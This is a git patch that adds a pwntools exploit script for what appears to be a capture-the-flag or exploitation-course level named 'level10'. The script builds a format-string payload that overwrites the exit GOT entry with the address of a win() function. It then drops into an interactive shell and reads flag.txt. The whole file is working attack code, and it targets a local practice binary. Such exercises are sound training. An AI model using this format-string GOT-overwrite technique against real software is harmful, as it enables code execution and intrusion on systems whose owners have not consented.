From ded1ad9d4c9944b797204f6e87ea676216c881d0 Mon Sep 17 00:00:00 2001
From: Eggert Jung <eggert.s.jung@wischhof13.de>
Date: Tue, 27 Jan 2026 02:16:46 +0100
Subject: [PATCH] 10

---
 4/level10/test.py | 37 +++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 4/level10/test.py

diff --git a/4/level10/test.py b/4/level10/test.py
new file mode 100644
index 0000000..c608ca3
--- /dev/null
+++ b/4/level10/test.py
@@ -0,0 +1,37 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = ELF('./level10')
+
+# Addresses
+exit_got = elf.got['exit']
+win_addr = elf.symbols['win']
+
+print("exit got: ", hex(exit_got))
+print("win     : ", hex(win_addr))
+
+# Build a fmtstr payload that rewrites exit@GOT ? win()
+# write_size='short' uses %hn twice for 2-byte writes
+
+#for i in range(1,30):
+#print("##################### ", i)
+p = process(elf.path)
+#p = remote("localhost", 4010)
+
+context.clear(arch = 'amd64')
+payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
+
+# Send and get shell
+p.recvuntil("talk about?".encode())
+p.sendline(payload)
+print("send: ", payload.hex())
+res = p.recvline()
+print("got: ", res)
+p.interactive()
+res = p.recvline()
+print("got: ", res)
+
+p.sendline("cat flag.txt")
+print("send cat")
+res = p.recvline()
+print("got: ", res)